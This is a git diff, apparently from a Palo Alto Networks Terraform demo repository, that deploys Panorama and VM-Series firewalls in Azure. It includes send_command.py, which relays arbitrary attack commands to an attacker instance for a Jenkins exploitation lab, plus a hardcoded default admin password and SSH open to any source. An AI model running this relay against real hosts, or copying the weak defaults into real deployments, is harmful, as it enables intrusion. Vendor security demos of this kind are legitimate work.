+azure-multiapi-storage==0.2.3 +azure-nspkg==3.0.2 +azure-storage==0.36.0 +azure-storage-blob==1.3.1 +azure-storage-common==1.4.0 +azure-storage-file==1.4.0 +azure-storage-nspkg==3.1.0 +bcrypt==3.1.6 +billiard==3.6.0.0 +celery==4.3.0 +certifi==2019.3.9 +cffi==1.12.3 +chardet==3.0.4 +collections2==0.3.0 +colorama==0.4.1 +constantly==15.1.0 +cryptography==2.4.2 +decorator==4.4.0 +Django==2.2.4 +django-widget-tweaks==1.4.3 +docker==3.7.2 +docker-pycreds==0.4.0 +fabric==2.4.0 +gitdb2==2.0.5 +GitPython==2.1.11 +gunicorn==19.9.0 +humanfriendly==4.18 +hyperlink==18.0.0 +idna==2.8 +incremental==17.5.0 +invoke==1.2.0 +ipaddress==1.0.22 +isodate==0.6.0 +Jinja2==2.10.1 +jmespath==0.9.4 +jsonpath-ng==1.4.3 +knack==0.5.4 +kombu==4.5.0 +MarkupSafe==1.1.1 +mock==2.0.0 +more-itertools==7.0.0 +msrest==0.6.6 +msrestazure==0.6.0 +oauthlib==3.0.1 +oyaml==0.9 +pan-python==0.14.0 +pandevice==0.6.6 +paramiko==2.4.2 +passlib==1.7.1 +pbr==5.2.0 +pluggy==0.9.0 +ply==3.11 +portalocker==1.2.1 +prompt-toolkit==1.0.15 +psutil==5.6.6 +py==1.8.0 +pyAesCrypt==0.4.2 +pyasn1==0.4.5 +pycparser==2.19 +pydocumentdb==2.3.3 +Pygments==2.3.1 +PyHamcrest==1.9.0 +PyJWT==1.7.1 +PyNaCl==1.3.0 +pyOpenSSL==19.0.0 +pyperclip==1.7.0 +pytest==4.4.0 +pytest-django==3.4.8 +python-dateutil==2.8.0 +python-terraform==0.10.0 +pytz==2019.1 +PyYAML==5.1 +requests==2.21.0 +requests-oauthlib==1.2.0 +scp==0.13.2 +six==1.12.0 +smmap2==2.0.5 +sqlparse==0.3.0 +sshtunnel==0.1.4 +tabulate==0.8.3 +Twisted==18.9.0 +txaio==18.8.1 +urllib3==1.24.2 +vine==1.3.0 +virtualenv==16.4.3 +virtualenv-clone==0.5.2 +vsts==0.1.25 +vsts-cd-manager==1.0.2 +wcwidth==0.1.7 +websocket-client==0.56.0 +xmltodict==0.12.0 +zope.interface==4.6.0 diff --git a/azure/Jenkins_proj-working/requirementsold2.txt b/azure/Jenkins_proj-working/requirementsold2.txt new file mode 100644 index 00000000..68742357 --- /dev/null +++ b/azure/Jenkins_proj-working/requirementsold2.txt @@ -0,0 +1,222 @@ +adal==1.2.1 +amqp==2.4.2 +antlr4-python3-runtime==4.7.2 +applicationinsights==0.11.8 +argcomplete==1.9.5 +asgiref==3.0.0 +asn1crypto==0.24.0 +async-timeout==3.0.1 +atomicwrites==1.3.0 +attrs==19.1.0 +autobahn==19.3.3 +Automat==0.7.0 +azure-batch==6.0.0 +azure-cli==2.0.63 +azure-cli-acr==2.2.5 +azure-cli-acs==2.3.22 +azure-cli-advisor==2.0.0 +azure-cli-ams==0.4.5 +azure-cli-appservice==0.2.18 +azure-cli-backup==1.2.4 +azure-cli-batch==4.0.0 +azure-cli-batchai==0.4.8 +azure-cli-billing==0.2.1 +azure-cli-botservice==0.1.10 +azure-cli-cdn==0.2.3 +azure-cli-cloud==2.1.1 +azure-cli-cognitiveservices==0.2.5 +azure-cli-command-modules-nspkg==2.0.2 +azure-cli-configure==2.0.22 +azure-cli-consumption==0.4.2 +azure-cli-container==0.3.16 +azure-cli-core==2.0.63 +azure-cli-cosmosdb==0.2.10 +azure-cli-deploymentmanager==0.1.0 +azure-cli-dla==0.2.5 +azure-cli-dls==0.1.9 +azure-cli-dms==0.1.3 +azure-cli-eventgrid==0.2.3 +azure-cli-eventhubs==0.3.4 +azure-cli-extension==0.2.5 +azure-cli-feedback==2.2.1 +azure-cli-find==0.3.2 +azure-cli-hdinsight==0.3.3 +azure-cli-interactive==0.4.3 +azure-cli-iot==0.3.8 +azure-cli-iotcentral==0.1.6 +azure-cli-keyvault==2.2.14 +azure-cli-kusto==0.2.2 +azure-cli-lab==0.1.7 +azure-cli-maps==0.3.4 +azure-cli-monitor==0.2.13 +azure-cli-network==2.3.7 +azure-cli-nspkg==3.0.3 +azure-cli-policyinsights==0.1.2 +azure-cli-privatedns==1.0.0 +azure-cli-profile==2.1.5 +azure-cli-rdbms==0.3.10 +azure-cli-redis==0.4.2 +azure-cli-relay==0.1.4 +azure-cli-reservations==0.4.2 +azure-cli-resource==2.1.14 +azure-cli-role==2.6.0 +azure-cli-search==0.1.1 +azure-cli-security==0.1.1 +azure-cli-servicebus==0.3.4 +azure-cli-servicefabric==0.1.17 +azure-cli-signalr==1.0.0 +azure-cli-sql==2.2.2 +azure-cli-sqlvm==0.1.1 +azure-cli-storage==2.4.1 +azure-cli-telemetry==1.0.2 +azure-cli-vm==2.2.19 +azure-common==1.1.20 +azure-datalake-store==0.0.39 +azure-functions-devops-build==0.0.21 +azure-graphrbac==0.60.0 +azure-keyvault==1.1.0 +azure-mgmt-advisor==2.0.1 +azure-mgmt-applicationinsights==0.1.1 +azure-mgmt-authorization==0.50.0 +azure-mgmt-batch==6.0.0 +azure-mgmt-batchai==2.0.0 +azure-mgmt-billing==0.2.0 +azure-mgmt-botservice==0.1.0 +azure-mgmt-cdn==3.1.0 +azure-mgmt-cognitiveservices==3.0.0 +azure-mgmt-compute==4.6.1 +azure-mgmt-consumption==2.0.0 +azure-mgmt-containerinstance==1.4.0 +azure-mgmt-containerregistry==2.7.0 +azure-mgmt-containerservice==4.4.0 +azure-mgmt-cosmosdb==0.5.2 +azure-mgmt-datalake-analytics==0.2.1 +azure-mgmt-datalake-nspkg==3.0.1 +azure-mgmt-datalake-store==0.5.0 +azure-mgmt-datamigration==0.1.0 +azure-mgmt-deploymentmanager==0.1.0 +azure-mgmt-devtestlabs==2.2.0 +azure-mgmt-dns==2.1.0 +azure-mgmt-eventgrid==2.0.0 +azure-mgmt-eventhub==2.3.0 +azure-mgmt-hdinsight==0.2.1 +azure-mgmt-iotcentral==1.0.0 +azure-mgmt-iothub==0.7.0 +azure-mgmt-iothubprovisioningservices==0.2.0 +azure-mgmt-keyvault==1.1.0 +azure-mgmt-kusto==0.3.0 +azure-mgmt-loganalytics==0.2.0 +azure-mgmt-managementgroups==0.1.0 +azure-mgmt-maps==0.1.0 +azure-mgmt-marketplaceordering==0.1.0 +azure-mgmt-media==1.1.1 +azure-mgmt-monitor==0.5.2 +azure-mgmt-msi==0.2.0 +azure-mgmt-network==2.6.0 +azure-mgmt-nspkg==3.0.2 +azure-mgmt-policyinsights==0.2.0 +azure-mgmt-privatedns==0.1.0 +azure-mgmt-rdbms==1.7.1 +azure-mgmt-recoveryservices==0.1.1 +azure-mgmt-recoveryservicesbackup==0.1.2 +azure-mgmt-redis==6.0.0 +azure-mgmt-relay==0.1.0 +azure-mgmt-reservations==0.3.1 +azure-mgmt-resource==2.1.0 +azure-mgmt-search==2.0.0 +azure-mgmt-security==0.1.0 +azure-mgmt-servicebus==0.5.3 +azure-mgmt-servicefabric==0.2.0 +azure-mgmt-signalr==0.1.1 +azure-mgmt-sql==0.12.0 +azure-mgmt-sqlvirtualmachine==0.2.0 +azure-mgmt-storage==3.1.1 +azure-mgmt-trafficmanager==0.51.0 +azure-mgmt-web==0.41.0 +azure-multiapi-storage==0.2.3 +azure-nspkg==3.0.2 +azure-storage-blob==1.3.1 +azure-storage-common==1.4.0 +azure-storage-nspkg==3.1.0 +bcrypt==3.1.6 +billiard==3.6.0.0 +celery==4.3.0 +certifi==2019.3.9 +cffi==1.12.3 +chardet==3.0.4 +colorama==0.4.1 +constantly==15.1.0 +cryptography==2.4.2 +decorator==4.4.0 +Django==2.2 +django-widget-tweaks==1.4.3 +docker==3.7.2 +docker-pycreds==0.4.0 +fabric==2.4.0 +gitdb2==2.0.5 +GitPython==2.1.11 +gunicorn==19.9.0 +humanfriendly==4.18 +hyperlink==18.0.0 +idna==2.8 +incremental==17.5.0 +invoke==1.2.0 +ipaddress==1.0.22 +isodate==0.6.0 +Jinja2==2.10.1 +jmespath==0.9.4 +jsonpath-ng==1.4.3 +knack==0.5.4 +kombu==4.5.0 +MarkupSafe==1.1.1 +mock==2.0.0 +more-itertools==7.0.0 +msrest==0.6.6 +msrestazure==0.6.0 +oauthlib==3.0.1 +oyaml==0.9 +pan-python==0.14.0 +paramiko==2.4.2 +passlib==1.7.1 +pbr==5.2.0 +pluggy==0.9.0 +ply==3.11 +portalocker==1.4.0 +prompt-toolkit==2.0.9 +psutil==5.6.6 +py==1.8.0 +pyAesCrypt==0.4.2 +pyasn1==0.4.5 +pycparser==2.19 +pydocumentdb==2.3.3 +Pygments==2.3.1 +PyHamcrest==1.9.0 +PyJWT==1.7.1 +PyNaCl==1.3.0 +pyOpenSSL==19.0.0 +pyperclip==1.7.0 +pytest==4.4.0 +pytest-django==3.4.8 +python-dateutil==2.8.0 +pytz==2019.1 +PyYAML==5.1 +requests==2.21.0 +requests-oauthlib==1.2.0 +scp==0.13.2 +six==1.12.0 +smmap2==2.0.5 +sqlparse==0.3.0 +sshtunnel==0.1.4 +tabulate==0.8.3 +Twisted==18.9.0 +txaio==18.8.1 +urllib3==1.24.2 +vine==1.3.0 +virtualenv==16.4.3 +virtualenv-clone==0.5.2 +vsts==0.1.25 +vsts-cd-manager==1.0.2 +wcwidth==0.1.7 +websocket-client==0.56.0 +xmltodict==0.12.0 +zope.interface==4.6.0 diff --git a/azure/Jenkins_proj-working/send_command.py b/azure/Jenkins_proj-working/send_command.py new file mode 100644 index 00000000..cbccbdfb --- /dev/null +++ b/azure/Jenkins_proj-working/send_command.py @@ -0,0 +1,63 @@ +#!/usr/bin/env python3 + +import requests +import argparse +from python_terraform import Terraform +import json +import sys + + +def get_terraform_outputs() -> dict: + tf = Terraform(working_dir='./WebInDeploy') + rc, out, err = tf.cmd('output', '-json') + + if rc == 0: + try: + return json.loads(out) + except ValueError as ve: + print('Could not parse terraform outputs!') + return dict() + + +def main(cli: str) -> None: + + print('Attempting to launch exploit...\n') + outputs = get_terraform_outputs() + + attacker = outputs['ATTACKER_IP']['value'] + payload = dict() + payload['cli'] = cli + + headers = dict() + headers['Content-Type'] = 'application/json' + headers['Accept'] = '*/*' + + try: + resp = requests.post(f'http://{attacker}:5000/send', data=json.dumps(payload), headers=headers) + if resp.status_code == 200: + print('Command Successfully Executed!\n') + print(resp.text) + sys.exit(0) + else: + print('Could not Execute Command!\n') + print(resp.text) + sys.exit(0) + except ConnectionRefusedError as cre: + print('Could not connect to attacker instance!') + sys.exit(1) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Send Jenkins Attack Command') + parser.add_argument('-c', '--cli', help='Attack Command', required=True) + parser.add_argument('-m', '--manual_cli', help='Manual Attack Command', required=False) + + args = parser.parse_args() + cli = args.cli + mcli = args.manual_cli + + if mcli is not None and mcli != '': + main(mcli) + else: + main(cli) + diff --git a/azure/panorama_new_rg/README.md b/azure/panorama_new_rg/README.md new file mode 100644 index 00000000..79c46c20 --- /dev/null +++ b/azure/panorama_new_rg/README.md @@ -0,0 +1,107 @@ +# Azure Panorama + +Terraform creates an instance of Panorama in a new Resource Group. + +## Prerequistes +* Valid Azure Subscription +* Access to Azure Cloud Shell + +## Caveats +You will need to determine the available versions of Panorama using the Azure CLI. The following command will show the Panorama versions currently available + +bash-4.3# az vm image list -p paloaltonetworks -f panorama --all +``` +[ + { + "offer": "panorama", + "publisher": "paloaltonetworks", + "sku": "byol", + "urn": "paloaltonetworks:panorama:byol:8.1.0", + "version": "8.1.0" + }, + { + "offer": "panorama", + "publisher": "paloaltonetworks", + "sku": "byol", + "urn": "paloaltonetworks:panorama:byol:8.1.2", + "version": "8.1.2" + }, + { + "offer": "panorama", + "publisher": "paloaltonetworks", + "sku": "byol", + "urn": "paloaltonetworks:panorama:byol:9.1.1", + "version": "9.1.1" + } +] +``` +## How to Deploy +### 1. Setup & Download Build +In the Azure Portal, open Azure Cloud Shell and run the following command (**BASH ONLY!**): +``` +# Accept VM-Series EULA for desired currently-available version of Panorama (see above command for urn) +$ az vm image terms accept --urn paloaltonetworks:panorama:byol:8.1.2 + +# Download repo & change directories to the Terraform build +$ git clone https://github.com/wwce/terraform; cd terraform/azure/panorama_new_rg +``` + +### 2. Edit variables.tf or create terraform.tfvars +The variables.tf file contains default settings for the template. It may be edited to suit specific requirements or the file terraform.tfvars.sample can be used to create a terraform.tfvars file to override some or all settings. + +Variable descriptions: + + virtualMachineRG = Name of resource group to create + + Location = Target Azure region + + virtualNetworkName = Virtual Network Name + + addressPrefix = VNet CIDR + + subnetName = Subnet name in the VNet + + subnet = Subnet CIDR + + publicIpAddressName = Panorama public IP address name + + networkInterfaceName = Panorama network interface name + + networkSecurityGroupName = Network Security Group (NSG) name + + diagnosticsStorageAccountName = Diagnostics Storage Account name + + diagnosticsStorageAccountTier = Diagnostics Storage Account tier + + diagnosticsStorageAccountReplication = Diagnostics Storage Account replication + + virtualMachineName = Panorama VM name + + virtualMachineSize = Panorama VM size + + panoramaVersion = Panorama Version + + adminUsername = Admin Username + + adminPassword = Admin Password + + +### 3. Deploy Build +``` +$ terraform init +$ terraform apply +``` + +
+ +## How to Destroy +Run the following to destroy the build. +``` +$ terraform destroy +``` + +
+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/azure/panorama_new_rg/interfaces.tf b/azure/panorama_new_rg/interfaces.tf new file mode 100644 index 00000000..f971b4e5 --- /dev/null +++ b/azure/panorama_new_rg/interfaces.tf @@ -0,0 +1,14 @@ +#### CREATE THE NETWORK INTERFACES #### + +resource "azurerm_network_interface" "panorama" { + name = "${var.networkInterfaceName}" + location = "${azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + ip_configuration { + name = "${var.networkInterfaceName}" + subnet_id = "${azurerm_subnet.panorama.id}" + private_ip_address_allocation = "Dynamic" + public_ip_address_id = "${azurerm_public_ip.panorama.id}" + } + depends_on = ["azurerm_public_ip.panorama"] +} \ No newline at end of file diff --git a/azure/panorama_new_rg/nsg.tf b/azure/panorama_new_rg/nsg.tf new file mode 100644 index 00000000..4e454d84 --- /dev/null +++ b/azure/panorama_new_rg/nsg.tf @@ -0,0 +1,32 @@ +resource "azurerm_network_security_group" "panorama" { + name = "${var.networkSecurityGroupName}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + location = "${azurerm_resource_group.resourcegroup.location}" + + security_rule { + name = "TCP-22" + priority = 100 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "22" + source_address_prefix = "*" + destination_address_prefix = "${azurerm_network_interface.panorama.private_ip_address}" + } + security_rule { + name = "TCP-443" + priority = 110 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "443" + source_address_prefix = "*" + destination_address_prefix = "${azurerm_network_interface.panorama.private_ip_address}" + } +} +resource "azurerm_subnet_network_security_group_association" "panorama" { + subnet_id = "${azurerm_subnet.panorama.id}" + network_security_group_id = "${azurerm_network_security_group.panorama.id}" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/outputs.tf b/azure/panorama_new_rg/outputs.tf new file mode 100644 index 00000000..b23d093b --- /dev/null +++ b/azure/panorama_new_rg/outputs.tf @@ -0,0 +1,3 @@ +output "Panorama Public IP:" { + value = "${azurerm_public_ip.panorama.ip_address}" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/panorama.tf b/azure/panorama_new_rg/panorama.tf new file mode 100644 index 00000000..4443ca98 --- /dev/null +++ b/azure/panorama_new_rg/panorama.tf @@ -0,0 +1,51 @@ +#### CREATE Panorama + +resource "azurerm_virtual_machine" "panorama" { + name = "${var.virtualMachineName}" + location = "${azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + network_interface_ids = + [ + "${azurerm_network_interface.panorama.id}", + ] + + primary_network_interface_id = "${azurerm_network_interface.panorama.id}" + vm_size = "${var.virtualMachineSize}" + + plan { + name = "byol" + publisher = "paloaltonetworks" + product = "panorama" + } + + storage_image_reference { + publisher = "paloaltonetworks" + offer = "panorama" + sku = "byol" + version = "${var.panoramaVersion}" + } + + storage_os_disk { + name = "${var.virtualMachineName}" + caching = "ReadWrite" + create_option = "FromImage" + managed_disk_type = "StandardSSD_LRS" + } + + delete_os_disk_on_termination = true + delete_data_disks_on_termination = true + + os_profile { + computer_name = "${var.virtualMachineName}" + admin_username = "${var.adminUsername}" + admin_password = "${var.adminPassword}" + } + + os_profile_linux_config { + disable_password_authentication = false + } + boot_diagnostics { + enabled = "true" + storage_uri = "${azurerm_storage_account.mystorageaccount.primary_blob_endpoint}" + } +} \ No newline at end of file diff --git a/azure/panorama_new_rg/public-ips.tf b/azure/panorama_new_rg/public-ips.tf new file mode 100644 index 00000000..09c1a7fc --- /dev/null +++ b/azure/panorama_new_rg/public-ips.tf @@ -0,0 +1,7 @@ +#### CREATE PUBLIC IP ADDRESSES #### +resource "azurerm_public_ip" panorama { + name = "${var.publicIpAddressName}" + location = "${azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + allocation_method = "Static" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/resource-group.tf b/azure/panorama_new_rg/resource-group.tf new file mode 100644 index 00000000..bb71e2a6 --- /dev/null +++ b/azure/panorama_new_rg/resource-group.tf @@ -0,0 +1,10 @@ +//# ********** RESOURCE GROUP ********** +//# Configure the Providers +provider "azurerm" {} +provider "random" {} + +//# Create a resource group +resource "azurerm_resource_group" "resourcegroup" { + name = "${var.virtualMachineRG}" + location = "${var.Location}" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/route-tables.tf b/azure/panorama_new_rg/route-tables.tf new file mode 100644 index 00000000..5d33ffa5 --- /dev/null +++ b/azure/panorama_new_rg/route-tables.tf @@ -0,0 +1,17 @@ +#### CREATE THE ROUTE TABLES #### + +resource "azurerm_route_table" "panorama" { + name = "panorama" + location = "${azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + route { + name = "internet" + address_prefix = "0.0.0.0/0" + next_hop_type = "internet" + } +} + +resource "azurerm_subnet_route_table_association" "panorama" { + subnet_id = "${azurerm_subnet.panorama.id}" + route_table_id = "${azurerm_route_table.panorama.id}" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/storage-account.tf b/azure/panorama_new_rg/storage-account.tf new file mode 100644 index 00000000..a3034ff1 --- /dev/null +++ b/azure/panorama_new_rg/storage-account.tf @@ -0,0 +1,11 @@ +# Storage account for boot diagnostics +resource "random_id" "storage_account" { + byte_length = 4 +} +resource "azurerm_storage_account" "mystorageaccount" { + name = "${var.diagnosticsStorageAccountName}${lower(random_id.storage_account.hex)}" + location = "${azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + account_tier = "${var.diagnosticsStorageAccountTier}" + account_replication_type = "${var.diagnosticsStorageAccountReplication}" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/terraform.tfvars.sample b/azure/panorama_new_rg/terraform.tfvars.sample new file mode 100644 index 00000000..7ce8eb6e --- /dev/null +++ b/azure/panorama_new_rg/terraform.tfvars.sample @@ -0,0 +1,33 @@ +virtualMachineRG = "" + +Location = "" + +virtualNetworkName = "" + +addressPrefix = "" + +subnetName = "" + +subnet = "" + +publicIpAddressName = "" + +networkInterfaceName = "" + +networkSecurityGroupName = "" + +diagnosticsStorageAccountName = "" + +diagnosticsStorageAccountTier = "" + +diagnosticsStorageAccountReplication = "" + +virtualMachineName = "" + +virtualMachineSize = "" + +panoramaVersion = "" + +adminUsername = "" + +adminPassword = "" \ No newline at end of file diff --git a/azure/panorama_new_rg/variables.tf b/azure/panorama_new_rg/variables.tf new file mode 100644 index 00000000..9456111b --- /dev/null +++ b/azure/panorama_new_rg/variables.tf @@ -0,0 +1,68 @@ +variable "virtualMachineRG" { + description = "Virtual Machine RG" + default = "pglynn-test" +} +variable "Location" { + description = "Location" + default = "centralus" +} +variable "virtualNetworkName" { + description = "Virtual Network Name" + default = "panorama" +} +variable "addressPrefix" { + description = "Address Prefix" + default = "10.0.0.0/24" +} +variable "subnetName" { + description = "Subnet Name" + default = "panorama" +} +variable "subnet" { + description = "Subnet" + default = "10.0.0.0/24" +} +variable "publicIpAddressName" { + description = "Public Ip Address Name" + default = "panorama" +} +variable "networkInterfaceName" { + description = "Network Interface Name" + default = "panorama" +} +variable "networkSecurityGroupName" { + description = "Network Security Group Name" + default = "panorama" +} +variable "diagnosticsStorageAccountName" { + description = "Diagnostics Storage Account Name" + default = "panorama" +} +variable "diagnosticsStorageAccountTier" { + description = "Diagnostics Storage Account Tier" + default = "Standard" +} +variable "diagnosticsStorageAccountReplication" { + description = "Diagnostics Storage Account Replication" + default = "LRS" +} +variable "virtualMachineName" { + description = "Virtual Machine Name" + default = "panorama" +} +variable "virtualMachineSize" { + description = "Virtual Machine Size" + default = "Standard_D3" +} +variable "panoramaVersion" { + description = "Panorama Version" + default = "8.1.2" +} +variable "adminUsername" { + description = "Admin Username" + default = "panadmin" +} +variable "adminPassword" { + description = "Admin Password" + default = "Pal0Alt0@123" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/vnet-subnets.tf b/azure/panorama_new_rg/vnet-subnets.tf new file mode 100644 index 00000000..fba7b3cf --- /dev/null +++ b/azure/panorama_new_rg/vnet-subnets.tf @@ -0,0 +1,18 @@ +# ********** VNET ********** + +# Create a virtual network +resource "azurerm_virtual_network" "vnet" { + name = "${var.virtualNetworkName}" + address_space = ["${var.addressPrefix}"] + location = "${azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +} + +# Create the subnet + +resource "azurerm_subnet" "panorama" { + name = "${var.subnetName}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + virtual_network_name = "${azurerm_virtual_network.vnet.name}" + address_prefix = "${var.subnet}" +} \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/GUIDE.pdf b/azure/transit_2fw_2spoke_common/GUIDE.pdf new file mode 100644 index 00000000..c66ebfe6 Binary files /dev/null and b/azure/transit_2fw_2spoke_common/GUIDE.pdf differ diff --git a/azure/transit_2fw_2spoke_common/README.md b/azure/transit_2fw_2spoke_common/README.md new file mode 100644 index 00000000..4c19611a --- /dev/null +++ b/azure/transit_2fw_2spoke_common/README.md @@ -0,0 +1,60 @@ +# 2 x VM-Series / Public LB / Internal LB / 2 x Spoke VNETs + +Terraform creates 2 VM-Series firewalls deployed in a transit VNET with two connected spoke VNETs (via VNET peering). The VM-Series firewalls secure all ingress/egress to and from the spoke VNETs. All traffic originating from the spokes is routed to an internal load balancer in the transit VNET's trust subnet. All inbound traffic from the internet is sent through a public load balancer. + +Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/azure/transit_2fw_2spoke_common/GUIDE.pdf) for more information. + +
+

+ +

+ + +## Prerequistes +* Valid Azure Subscription +* Access to Azure Cloud Shell + +
+ +## How to Deploy +### 1. Setup & Download Build +In the Azure Portal, open Azure Cloud Shell and run the following **BASH ONLY!**. +``` +# Accept VM-Series EULA for desired license type (BYOL, Bundle1, or Bundle2) +$ az vm image terms accept --urn paloaltonetworks:vmseries1::9.0.1 + +# Download repo & change directories to the Terraform build +$ git clone https://github.com/wwce/terraform; cd terraform/azure/transit_2fw_2spoke_common +``` + +### 2. Edit terraform.tfvars +Open terraform.tfvars and uncomment one value for fw_license that matches your license type from step 1. + +``` +$ vi terraform.tfvars +``` + +

+Your terraform.tfvars should look like this before proceeding + +

+ +### 3. Deploy Build +``` +$ terraform init +$ terraform apply +``` + +
+ +## How to Destroy +Run the following to destroy the build. +``` +$ terraform destroy +``` + +
+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml b/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml new file mode 100644 index 00000000..47185aa0 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml @@ -0,0 +1,1058 @@ + + + + + + + + + yes + no + yes + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + + + 8.8.8.8 + 4.2.2.2 + + + fw1 + + + + yes + + + FQDN + + fw1 + paloalto + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + + + + yes + + + + + + + + + + no + + allow-health-probe + + no + + + yes + no + + + + + + + + no + + allow-health-probe + + no + + + yes + no + + + + + + + + + + 3 + 5 + wait-recover + + + + + no + no + yes + no + no + no + no + no + no + no + no + + + + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + + + 10 + 10 + 30 + 110 + 30 + 110 + 200 + 20 + 120 + + + + + + + 10.0.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + trust-vr + + + None + + + no + any + 2 + + 10 + 10.1.0.0/16 + + + + + + + trust-vr + + + None + + + no + any + 2 + + 10 + 10.2.0.0/16 + + + + + + + + + + + + + + + + ethernet1/2 + + + 10 + 10 + 30 + 110 + 30 + 110 + 200 + 20 + 120 + + + + + + + 10.0.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 168.63.129.16/32 + + + + + + + untrust-vr + + + None + + + no + any + 2 + + 10 + 0.0.0.0/0 + + + + + + + 10.0.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.1.0.0/16 + + + + + + + 10.0.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.2.0.0/16 + + + + + + + + + + + + + + + + + yes + + + no + + + no + + + no + + + no + + + + + + + + + + + + ethernet1/2 + + + no + + + + + ethernet1/1 + + + no + + + + + + ethernet1/2 + ethernet1/1 + vlan + loopback + tunnel + + + + untrust-vr + trust-vr + + + + + + + + + + + 22 + + + + + + + + + + + + + + + any + + + any + + + azure-lb-probe + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + web-browsing + + + application-default + + + any + + allow + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + ssh + + + application-default + + + any + + allow + + + universal + + trust + + + trust + + + spoke1-vnet + spoke2-vnet + + no + + any + + + any + + + spoke1-vnet + spoke2-vnet + + no + + ping + ssh + web-browsing + + + application-default + + + any + + allow + no + yes + no + no + + + + universal + + trust + + + untrust + + + spoke1-vnet + spoke2-vnet + + no + + any + + + any + + + any + + no + + apt-get + ntp + ping + ssl + web-browsing + + + application-default + + + any + + allow + no + yes + no + no + + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + + + + + + + + + + + + ipv4 + + untrust + + + untrust + + any + any + + azure-lb-probe + + + any + + no + This NAT policy prevents the public load balancer's health probes from being NATed. + + + ipv4 + + untrust + + + untrust + + ethernet1/1 + service-http + + any + + + any + + no + + + + ethernet1/2 + + + + + spoke1-intlb + 80 + + NATs inbound request to internal LB in spoke1 + + + ipv4 + + untrust + + + untrust + + ethernet1/1 + tcp-22 + + any + + + any + + no + + + + ethernet1/2 + + + + + spoke2-vm + 22 + + NATs inbound request to jump server in Spoke 1. + + + ipv4 + + trust + + + untrust + + any + any + + any + + + any + + + + + ethernet1/1 + + + + no + + + + + + + + + + + + + +
+ + 168.63.129.16/32 + + azure-resource + + + + 10.1.0.4 + + azure-resource + + + + 10.2.0.4 + + azure-resource + + + + 10.1.0.0/16 + + azure-resource + + + + 10.2.0.0/16 + + azure-resource + + + + 10.1.0.100 + + azure-resource + + +
+ + + + + + + + + + color20 + + + color13 + + + color24 + + + color22 + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+
